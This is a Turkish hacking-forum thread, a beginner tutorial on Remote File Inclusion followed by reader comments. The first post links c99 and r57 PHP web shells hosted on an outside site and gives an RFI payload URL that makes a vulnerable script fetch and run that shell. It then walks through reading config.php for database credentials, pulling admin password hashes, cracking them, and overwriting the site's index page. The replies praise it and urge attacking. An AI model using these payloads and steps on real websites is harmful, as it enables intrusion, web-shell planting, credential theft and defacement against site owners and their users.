Yeni Başlayanlar İçin Hacking/5.Bölüm-RFI Nedir,Nasıl Yapılır?
-
Bu saatte beni deli skti:D .Şu çok meşhur rfi yöntemini anlatmak istedim.Evet RFI nedir?RFI açılımı Remote File Inclusion dır. Uzaktan dosya dahil etmek yani. PHP scriptlerde bulunan bir açıktır. Siteye dosya eklememize yarar. Peki bu nasıl olur, yani bu açık ortaya nasıl çıkar? Programlama dillerinde değişkenler vardır ve bunların içinde bilgiler saklanır, öyle diyim. RFI açığı olan yerde, değişken tanımlı değildir, yani değişkenin bir değeri yoktur diyelim bizde o değişkeni kendi dosyamızla doldururuz (c99,r57 birazdan değineceğim) olayın mantığı bu :) Şimdi siteye nasıl dosya atıcaz? Gözat/upload olayını kastetmiyorum burada. RFI açığı bulunan scriptlere kendi shellimizi sokucaz önce shelleri verelim;
http://www.megaturks.by.ru/c99.txt
http://www.megaturks.by.ru/r57.txt
Biz burada c99 kullanıcaz siteler üzerinde işlem yaparken c99 daha idealdir,server rootlarken falan r57yi kullanırız. Bu sheller php file system objectlerdir, dosyalar üzerinde işlem yapmamıza yararlar. Şimdi bir sitede nasıl meydana gelir RFI açığı yani daha doğrusu ne şekilde kullanılır, görelim. www.milw0rm.com dan herhangi bir scriptteki RFI açığına bakalım;
[Path]cep/lib/pcltar.lib.php?g_pcltar_lib_dir=shell
Pathi değiştireceksiniz tabi sayfanın bulunduğu yer olacak orası bir de nereyi değiştiricez? tabi ki shell bölümünü! Shell yazan yere kendi shellimizin linkini yazalım yani ;
cep/lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.megaturks.by.ru/c99.txt?
Evet eğer açık varsa shellimize giricez,shell nasıl bi yer merak ediyosunuz di mi? Resmini de koyim ;
Yazma iznimizin olduğu noktalara ki resimlerde görülüyor indeximizi atabiliriz.Peki ya yazma iznimiz yoksa?Kaçıcak mıyız,tabi ki hayır...
Biz şu an tüm (herhangi bir siteye shell soktuğumuzu farzedin) dosyaları görebiliyoruz değil mi?
-evetE o zaman veritabanı bilgilerinin bulunduğu "config.php" dosyasını da görürüz :).Bu dosyayı bulun ve içindeki dbusername,dbpass gibi bilgileri bir yere not edin.
Yukarıda SQL diye bir kutucuk göreceksiniz.Ona tıklayın(şu yani);
config.php de ki bilgileri saklamıştık SQL bölümünde aşağıdaki resimdeki yerlere yazıyoruz;
Bağlandıktan sonra user şifrelerini bulabileceğimiz user adlı bölümü buluruz,orada ilk user falan admindir,onların şifreleri yanlarında yazar ama md5li bir şekildedir,md5leri bir md5 hash çözme sitesinden çözebilirsiniz.Evet arkadaşlar ben config.php dosyasını falan aramaya üşendim ,bakmadım bile: ) .Zaten önemli yerler buralarıydı ,umarım yeni arkadaşlara faydalı olmuştur,saat geç yorgunlukta var yazarken bi hata olduysa affola (dün gece yazdım bi problem çıktı eklenemedi ) :)
Not:Tarafımdan yazıldı çalıntı değil,bir de PitBull arkadaşıma teşekkürler,siteyi ve shelleri verdiği için yoksa ben üşenip site falan aramazdım ve resimsiz bir doküman çıkardı ortaya. -
Güzel döküman olmuş hoca tebrikler...
-
emeğine sağlık iyi paylaşım saldırmak gerek :)
-
höh imanım gevredi layn :\
güzel dökümal ama fakat açığın teorik kısmına yani açıklayıcı kısmına biraz daha değinseydin daha hoş görükürdü gözüme. ama pratik anlamda yararlı :)
-
abi adres cubugunu silmişsin de titlelar duruyor xD
-
biliyorum abi kendi shellinizi sokun adamınkinden şey etmeyin bi nevi pratik :)
-
Güzel yazı olmuş hoca tebrikler.Konuyu zıplatalım görmeyen arkadaşlarda faydalansın :)
-
ellerine sağlık sabaha kadar bekledim eklemeni amq dayanamadım yattım sonra süpersin ;)
-
Eyw hacı :D valla cosmice sormuştum araştır diodu ipne :D :P
-
eywalalh antioksid kardes ne demek her zqman ne zaman ıstersen soyle paylasımın ıcın elımden gelen yardımı ederım kardesım ;) elelrıne saglık guzel bı paylasım ;)
-
---RudeboY--- bunu yazdı:
-----------------------------
Eyw hacı :D valla cosmice sormuştum araştır diodu ipne :D :P
-----------------------------ne zmn sordun laaaaa hiç hatırlamıom sen php-fucker la uğraşırken ben bunla oğraşıodum o akşam ama bi boq yapamadık ;D
Toplam Hit: 6349 Toplam Mesaj: 18